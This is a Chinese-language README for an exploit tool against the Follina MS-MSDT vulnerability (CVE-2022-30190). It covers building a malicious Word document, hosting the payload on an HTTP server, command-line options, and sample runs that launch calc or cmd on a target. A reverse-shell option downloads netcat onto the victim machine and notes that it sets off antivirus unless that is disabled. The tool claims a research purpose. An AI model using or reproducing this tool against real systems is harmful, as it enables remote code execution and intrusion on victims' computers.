FOLLINA-CVE-2022-30190 的实现
本仓库包含针对漏洞 FOLLINA-CVE-2022-30190 的利用工具
本工具仅用于安全测试和研究目的。 克隆/复刻本工具即表示原始开发者不对行为人的行为承担任何责任。
通过构造恶意的 Microsoft Word 文档来发起 "Follina" MS-MSDT 攻击,并通过 HTTP 服务器托管 payload。
usage: exploit.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]
options:
-h, --help 显示此帮助信息并退出
--command COMMAND
要在目标上执行的命令(默认:calc)
--output OUTPUT
输出的恶意文档文件(默认:./follina.doc)
--interface INTERFACE
用于托管 HTTP 服务器的网络接口或 IP 地址(默认:eth0)
--port PORT
托管 HTTP 服务器的端口(默认:8000)
弹出 calc.exe:
$ python3 exploit.py
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./cve202230190.doc
[+] serving html payload on :8000
弹出 cmd.exe:
$ python3 exploit.py --command "cmd"
在端口 9001 上获取反向 shell。注意,这会将 netcat 二进制文件下载到受害者计算机并放置在 C:\Windows\Tasks 中。
它不会清理二进制文件。除非禁用防病毒软件,否则会触发防病毒检测。
$ python3 exploit.py --reverse 9001